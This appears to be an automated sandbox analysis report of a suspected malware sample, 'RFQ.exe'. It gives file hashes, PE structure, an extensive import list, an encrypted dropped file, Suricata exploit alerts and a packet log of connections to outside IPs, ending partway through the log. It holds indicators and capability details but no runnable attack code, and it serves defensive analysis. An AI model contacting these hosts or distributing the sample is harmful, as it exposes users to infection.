                                                                        C:\Users\user\AppData\Local\Temp\fricandeaux

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\RFQ.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):288768
                                                                        Entropy (8bit):7.99476597855917
                                                                        Encrypted:true
                                                                        SSDEEP:6144:tkUFCALQrORWQ7XPusIbL26Rrq8xxR161ep/wXgluSCKfFz42:tZCI6ORWq7+K6U8x161FSoWX
                                                                        MD5:07787B7FDF65B59807C98A7F6C108CCA
                                                                        SHA1:26B5D8C31482315466C7F2D1A55C8CB8CB8A0F3E
                                                                        SHA-256:08CC9C8E6A6F1D32101FFEEBE5623311FCD437C3E741B3200779E665CA95E116
                                                                        SHA-512:D8F6CA336EFDCA38BEAC1D4A317D580BE6E29703A7CF074E9BD226020438D4BE84A0F7DF56EEB22426B97D58A9E5EF6F3EA3C3356586FA202CACE73DCBA12C90
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.....VPXH..;....L5...~[B...BRHLVPXHZSJ2YHEL7DL697DVXJRUIB.HLV^G.TS.;.i.M{.mbQ^7v(8=2;#?h/7>6'.s(Wy:0".-".}x.v5%60gO_BhVPXHZSJKXA.qW#..YP.k8-.O..r,1.B..vR>._.pV^..?;"o5..RHLVPXHZ..2Y.DM7M.;d7DVXJRUI.RJM]QSHZ.N2YHEL7DL6.#DVXZRUI2VHLV.XHJSJ2[HEJ7DL697DPXJRUIBRH<RPXJZSJ2YHGLw.L6)7DFXJRUYBRXLVPXHZCJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXd&016RHLr.\HZCJ2Y.AL7TL697DVXJRUIBRHlVP8HZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2YHEL7DL697DVXJRUIBRHLVPXHZSJ2Y

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.528072517069111
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:RFQ.exe
                                                                        File size:1'338'211 bytes
                                                                        MD5:85496e3bd4f547ed3ecb4bba94401773
                                                                        SHA1:a59428a86cc0e1b04e05444a66a862dc872f24d1
                                                                        SHA256:ca6e99cb086dcbdeaa2e6dcefd08a5907eb2f6b0cee11da6aef68818bbdaa72b
                                                                        SHA512:c020b61ffd0948f6195ec5f431f2913001d328d5df719b915b1249f466f8d9557ff54fb74ff4d4532441a2b17c963cef9794a6ce6d2c9cf8f111fbb0ea8f058a
                                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCJvCojfsNEuw4RPayIbHSsA/9RXiJuS:7JZoQrbTFZY1iaCJVfCEv4RPNIrq/7Xi
                                                                        TLSH:2955E122F5C68036C2B327B19E7EF766963979360336D19B37C82E215EA05416B39733
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                        File Icon

                                                                        Icon Hash:1733312925935517

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4165c1
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F7E7880811Bh
                                                                        jmp 00007F7E787FEF8Eh
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                        mov ecx, dword ptr [ebp+10h]
                                                                        mov edi, dword ptr [ebp+08h]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F7E787FF10Ah
                                                                        cmp edi, eax
                                                                        jc 00007F7E787FF2A6h
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F7E787FF11Eh
                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                        je 00007F7E787FF115h
                                                                        push edi
                                                                        push esi
                                                                        and edi, 0Fh
                                                                        and esi, 0Fh
                                                                        cmp edi, esi
                                                                        pop esi
                                                                        pop edi
                                                                        jne 00007F7E787FF107h
                                                                        jmp 00007F7E787FF4E2h
                                                                        test edi, 00000003h
                                                                        jne 00007F7E787FF116h
                                                                        shr ecx, 02h
                                                                        and edx, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F7E787FF12Bh
                                                                        rep movsd
                                                                        jmp dword ptr [00416740h+edx*4]
                                                                        mov eax, edi
                                                                        mov edx, 00000003h
                                                                        sub ecx, 04h
                                                                        jc 00007F7E787FF10Eh
                                                                        and eax, 03h
                                                                        add ecx, eax
                                                                        jmp dword ptr [00416654h+eax*4]
                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                        nop
                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                        nop
                                                                        inc cx
                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                        inc cx
                                                                        add byte ptr [ebx], ah
                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                        inc esi
                                                                        add dword ptr [eax+468A0147h], ecx
                                                                        add al, cl
                                                                        jmp 00007F7E7AC77907h
                                                                        add esi, 03h
                                                                        add edi, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F7E787FF0CEh
                                                                        rep movsd
                                                                        jmp dword ptr [00000000h+edx*4]

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ C ] VS2010 SP1 build 40219
                                                                        • [C++] VS2010 SP1 build 40219
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2010 SP1 build 40219
                                                                        • [RES] VS2010 SP1 build 40219
                                                                        • [LNK] VS2010 SP1 build 40219

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                        Imports

                                                                        DLLImport
                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishGreat Britain
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-07T17:57:24.228610+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.749730TCP
                                                                        2024-11-07T17:58:03.692339+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.749841TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 7, 2024 17:57:41.799952984 CET4981280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:57:41.804934978 CET80498123.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:57:41.805013895 CET4981280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:57:41.814068079 CET4981280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:57:41.818998098 CET80498123.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:57:45.552470922 CET80498123.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:57:45.586715937 CET80498123.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:57:45.586858988 CET4981280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:57:45.588366032 CET4981280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:57:45.593521118 CET80498123.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:58:00.708236933 CET4984080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:00.713260889 CET8049840217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:00.713395119 CET4984080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:00.725179911 CET4984080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:00.730109930 CET8049840217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:01.520694971 CET8049840217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:01.575995922 CET4984080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:01.631076097 CET8049840217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:01.631197929 CET4984080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:02.232445002 CET4984080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:03.315438032 CET4984280192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:03.320400953 CET8049842217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:03.320502996 CET4984280192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:03.416752100 CET4984280192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:03.421699047 CET8049842217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:04.139786959 CET8049842217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:04.185456038 CET4984280192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:04.250086069 CET8049842217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:04.250211954 CET4984280192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:04.951112986 CET4984280192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:05.969880104 CET4984380192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:05.975009918 CET8049843217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:05.975130081 CET4984380192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:06.001827955 CET4984380192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:06.007005930 CET8049843217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:06.007045031 CET8049843217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:06.796307087 CET8049843217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:06.841669083 CET4984380192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:06.904697895 CET8049843217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:06.904763937 CET4984380192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:07.513583899 CET4984380192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:08.537240982 CET4984480192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:08.542244911 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:08.542326927 CET4984480192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:08.549515009 CET4984480192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:08.554368019 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:09.371634007 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:09.371654987 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:09.371665955 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:09.371670961 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:09.371895075 CET4984480192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:09.484173059 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:09.484473944 CET4984480192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:09.485270023 CET4984480192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:58:09.490804911 CET8049844217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:58:14.644335032 CET4984580192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:14.649132967 CET8049845199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:14.649297953 CET4984580192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:14.664915085 CET4984580192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:14.669743061 CET8049845199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:15.275690079 CET8049845199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:15.275796890 CET8049845199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:15.275873899 CET4984580192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:15.276067019 CET8049845199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:15.276206017 CET4984580192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:16.177350998 CET4984580192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:17.189100027 CET4984680192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:17.194160938 CET8049846199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:17.194293976 CET4984680192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:17.205637932 CET4984680192.168.2.7199.59.243.227
